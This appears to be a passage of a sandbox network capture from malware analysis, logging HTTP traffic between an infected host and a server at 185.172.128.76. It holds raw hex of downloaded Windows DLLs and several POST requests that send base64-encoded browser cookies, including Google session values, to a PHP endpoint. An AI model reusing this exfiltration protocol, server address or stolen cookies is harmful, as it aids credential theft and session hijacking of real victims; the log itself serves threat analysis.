                                                                                                                                                                                                                                            Content-Length: 1106998
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                            ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:15.380383015 CEST1289INData Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
                                                                                                                                                                                                                                            Data Ascii: @B/81s:<R@B/92P @B
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:15.380397081 CEST1289INData Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89
                                                                                                                                                                                                                                            Data Ascii: +C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q|$D$4$*|$D$4$s|$D$4$
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:15.380410910 CEST1289INData Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a
                                                                                                                                                                                                                                            Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:15.380422115 CEST1289INData Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75
                                                                                                                                                                                                                                            Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:17.443062067 CEST952OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJE
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 751
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6YVlMc2RwVzRVRVlOM3ZZcV9yYlJyTkZ4TTFqb3pQR3Voak9SQlpLS016MnRkRHBWZTdkTnVUV3A0Q3lLLXp0NUlzNndWRWx2ZVdBZktRZ3dOSmlLS3RYSENDQ21ybGd6WlRsNUNpS2pUZUEyaVFxZjZ6bFJLMmg4d2cxaFZwSXNXc2FLcWFXSnlITVBGM0pBCg==------AKFHCAKJDBKKEBFIIJJE--
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:17.771689892 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:17 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:17.834619999 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 359
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="file"------HIIIEGDBKJKEBGCBAFCF--
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:18.163660049 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:18 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:19.126265049 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFC
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 359
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="file"------AAEBAFBGIDHCBFHIECFC--
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:19.451155901 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:20.259871960 CEST93OUTGET /15f649199f40275b/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:20.569632053 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:20 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                            Content-Length: 685392
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:21.752501965 CEST93OUTGET /15f649199f40275b/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:22.062078953 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:21 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                            Content-Length: 608080
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
